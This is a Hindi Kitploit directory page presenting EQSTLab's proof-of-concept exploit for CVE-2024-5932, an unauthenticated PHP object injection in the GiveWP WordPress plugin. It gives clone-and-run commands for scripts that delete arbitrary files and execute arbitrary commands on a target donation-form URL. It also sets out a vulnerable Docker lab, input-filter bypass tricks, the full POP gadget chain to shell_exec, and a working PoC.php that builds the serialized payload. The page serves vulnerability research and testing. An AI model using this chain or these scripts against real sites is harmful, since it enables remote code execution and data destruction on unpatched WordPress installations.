Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-5932 — CVE-2024-5932 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, GiveWP WordPress प्लगइन में एक PHP ऑब्जेक्ट इंजेक्शन भेद्यता, जो POP चेन के माध्यम से अप्रमाणित रिमोट कोड निष्पादन और मनमानी फ़ाइल हटाने को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/nishant-kumar-5173/cve-2024-5932
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHub
nishant-kumar-5173/cve-2024-5932

CVE-2024-5932

CVE-2024-5932 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, GiveWP WordPress प्लगइन में एक PHP ऑब्जेक्ट इंजेक्शन भेद्यता, जो POP चेन के माध्यम से अप्रमाणित रिमोट कोड निष्पादन और मनमानी फ़ाइल हटाने को सक्षम करता है।

रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

यह पोस्ट EQSTLab द्वारा प्रकाशित एक शोध लेख है।

❗❗ महत्वपूर्ण ❗❗

वर्तमान में xmrig चलाने वाले नकली PoC github रिपॉजिटरी हैं। अधिक जानकारी के लिए नीचे दिए गए लिंक देखें:

URL1: https://x.com/win3zz/status/1828704644987511107

URL2: https://x.com/bornunique911/status/1828712791844524453

URL3: https://x.com/Chocapikk_/status/1828801346637856841

CVE-2024-5932

★ CVE-2024-5932 मनमाना फ़ाइल हटाना और RCE PoC ★

https://github.com/user-attachments/assets/333e347a-fd71-404a-962b-2d0d4bb952c7

समयरेखा

25 अगस्त : CVE-2024-5932 फ़ाइल हटाना PoC अपलोड किया गया

26 अगस्त : हमने CVE-2024-5932 का उपयोग करके मनमाने आदेशों को सफलतापूर्वक निष्पादित किया है, लेकिन प्रभाव के कारण प्रकटीकरण पर विचार कर रहे हैं।

27 अगस्त : हमें RCE Security के Julien Ahrens द्वारा एक पोस्ट में PoC का विस्तृत विश्लेषण मिला और हमने अपना RCE PoC प्रकाशित करने का निर्णय लिया। हमने एक अतिरिक्त RCE PoC को CVE-2024-5932-rce.py के रूप में अपलोड किया।

विवरण

CVE-2024-5932 : GiveWP PHP ऑब्जेक्ट इंजेक्शन भेद्यता विवरण: WordPress के लिए GiveWP डोनेशन प्लगइन और फंडरेज़िंग प्लेटफ़ॉर्म प्लगइन 'give_title' पैरामीटर से अविश्वसनीय इनपुट के डिसीरियलाइज़ेशन के माध्यम से संस्करण 3.14.1 तक (और सहित) सभी संस्करणों में PHP ऑब्जेक्ट इंजेक्शन के लिए संवेदनशील है। इससे अनप्रमाणित हमलावरों के लिए PHP ऑब्जेक्ट इंजेक्ट करना संभव हो जाता है। POP श्रृंखला की अतिरिक्त उपस्थिति हमलावरों को दूरस्थ रूप से कोड निष्पादित करने और मनमानी फ़ाइलों को हटाने की अनुमति देती है।

उपयोग कैसे करें

Git क्लोन

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2024-5932.git
cd CVE-2024-5932

पैकेज इंस्टॉल करें

root@kitploit:~
pip install -r requirements.txt

कमांड

root@kitploit:~
# मनमाना फ़ाइल हटाना
python CVE-2024-5932.py -u <URL_TO_EXPLOIT(Donation Form URL)> -f <FILE_TO_DELETE>
# दूरस्थ कोड निष्पादन
python CVE-2024-5932-rce.py -u <URL_TO_EXPLOIT(Donation Form URL)> -c <COMMAND_TO_EXECUTE>

उदाहरण

root@kitploit:~
python CVE-2024-5932.py -u http://example.com/2024/08/24/donation2/ -f /tmp/test
python CVE-2024-5932-rce.py -u http://example.com/2024/08/24/donation2/ -c "touch /tmp/test"

आउटपुट

CVE-2024-5932.py 0

CVE-2024-5932-rce.py 1

परिणाम

image 2

संवेदनशील वातावरण

1. docker-compose.yml

root@kitploit:~
services:
  db:
    image: mysql:8.0.27
    command: '--default-authentication-plugin=mysql_native_password'
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=somewordpress
      - MYSQL_DATABASE=wordpress
      - MYSQL_USER=wordpress
      - MYSQL_PASSWORD=wordpress
    expose:
      - 3306
      - 33060
  wordpress:
    image: wordpress:6.3.2
    ports:
      - 80:80
    restart: always
    environment:
      - WORDPRESS_DB_HOST=db
      - WORDPRESS_DB_USER=wordpress
      - WORDPRESS_DB_PASSWORD=wordpress
      - WORDPRESS_DB_NAME=wordpress
volumes:
  db_data:

2. फिर संवेदनशील GiveWP प्लगइन डाउनलोड करें:

https://downloads.wordpress.org/plugin/give.3.14.1.zip

3. GiveWP प्लगइन ज़िप फ़ाइल को अनज़िप करें और पूरी फ़ाइल को “/var/www/html/wp-content/plugins” निर्देशिका में कॉपी करें।

root@kitploit:~
docker cp give docker-wordpress-1:/var/www/html/wp-content/plugins

4. GiveWP प्लगइन सक्रिय करें

image

5. GiveWP प्लगइन के साथ नई पोस्ट जोड़ें और पोस्ट लिंक कॉपी करें

image

6. संवेदनशील लिंक जांचें

image

(वैकल्पिक) डॉकर वातावरण में लक्ष्य फ़ाइल सेट करें

पहले, निम्न कमांड के साथ वर्डप्रेस शेल तक पहुंचें:

root@kitploit:~
docker exec -it -u root docker-wordpress-1 /bin/bash

यदि फ़ाइल रूट के स्वामित्व में है, तो अनुमतियों के कारण इसे हटाया नहीं जा सकता है। इसलिए, आपको निम्न कमांड के साथ परीक्षण फ़ाइल का स्वामित्व बदलने की आवश्यकता है:

root@kitploit:~
touch test && chown www-data test

image

PHPSTORM के माध्यम से डिबगिंग

आप PHPSTORM का उपयोग करके अपने GiveWP को डिबग कर सकते हैं।

1. अपने वर्डप्रेस (डॉकर) में xdebug डाउनलोड करें:

root@kitploit:~
pecl install xdebug

2. और फिर वर्डप्रेस की php.ini फ़ाइल इस प्रकार सेट करें (डॉकर):

root@kitploit:~
[DEBUG]
zend_extension=/usr/local/lib/php/extensions/no-debug-non-zts-20200930/xdebug.so
xdebug.mode=debug
xdebug.start_with_request=trigger
xdebug.remote_enable=on
xdebug.remote_handler=dbgp
xdebug.client_host={your_PHPSTORM_address}
xdebug.client_port={your_PHPSTORM_debugging_port}
xdebug.idekey=PHPSTORM
xdebug.profiler_enable_trigger=1
xdebug.trace_enable_trigger=1

..और फिर आप अपने वर्डप्रेस को डिबग कर सकते हैं।

3. PHPSTORM इस प्रकार सेट करें (स्थानीय):

image image

4. PHPSTORM उदाहरण (जैसे TCPDF मनमाना फ़ाइल हटाना)

image

विश्लेषण

संवेदनशील बिंदु (includes/payments/class-give-payment.php)

इस बिंदु पर, get_meta() फ़ंक्शन पहले से सहेजे गए "give_title" मान को डिसीरियलाइज़ करता है।

root@kitploit:~
switch ( $key ) {
						case 'title':
							$user_info[ $key ] = Give()->donor_meta->get_meta( $donor->id, '_give_donor_title_prefix', true );
							break;
...

बाईपास तकनीक

strip_tags: nullbytes को बदलें -> \0 का उपयोग करें

stripslashes_deep: बैकस्लैश बदलें -> \\\\ का उपयोग करें

RCE के लिए POP श्रृंखला

Stripe\StripeObject->__toString()

Stripe\StripeObject->toArray()

Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData->toArray()

Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData->getLegacyBillingAddress()

Give->__get('address1')

\Give\Vendors\Faker\ValidGenerator->get('address1')

\Give\Vendors\Faker\ValidGenerator->__call('get', 'address1')

Give\Onboarding\SettingsRepository->get('address1') (Return command string)

call_user_func('shell_exec', 'command')

PoC.php

root@kitploit:~
<?php
namespace Stripe{
	class StripeObject
	{
		protected $_values;
		public function __construct(){
			$this->_values['foo'] = new \Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData();
		}
	}
}

namespace Give\PaymentGateways\DataTransferObjects{
	class GiveInsertPaymentData{
    public $userInfo;
		public function __construct()
    {
        $this->userInfo['address'] = new \Give();
    } 
	}
}	

namespace{
	class Give{
		protected $container;
		public function __construct()
		{
			$this->container = new \Give\Vendors\Faker\ValidGenerator();
		}
	}
}

namespace Give\Vendors\Faker{
	class ValidGenerator{
		protected $validator;
		protected $generator;
		public function __construct()
		{
			$this->validator = "shell_exec";
			$this->generator = new \Give\Onboarding\SettingsRepository();
		}
	}
}

namespace Give\Onboarding{
	class SettingsRepository{
		protected $settings;
		public function __construct()
		{
			$this -> settings['address1'] = 'touch /tmp/EQSTtest';
		}
	}
}

namespace{
	$a = new Stripe\StripeObject();
	echo serialize($a);
}

हमला परिदृश्य

POP श्रृंखला के माध्यम से RCE

POP श्रृंखला दूरस्थ कमांड निष्पादन की अनुमति देती है। image

मनमाना फ़ाइल हटाना

TCPDF का उपयोग करके, आप मनमाना फ़ाइल हटाने का शोषण कर सकते हैं।

अस्वीकरण

यह रिपॉजिटरी CVE-2024-5932 के लिए ऑब्जेक्ट इंजेक्शन शोषण होने का इरादा नहीं है। इस परियोजना का उद्देश्य लोगों को इस भेद्यता के बारे में जानने में मदद करना है, और शायद अपने स्वयं के अनुप्रयोगों का परीक्षण करना है।

EQST अंतर्दृष्टि

हम महीने में एक बार CVE और मैलवेयर विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक का अनुसरण करें। https://www.skshieldus.com/eng/business/insight.do

संदर्भ

https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/

https://skshieldus.com/eng/business/insight.do#

टूल डाउनलोड करें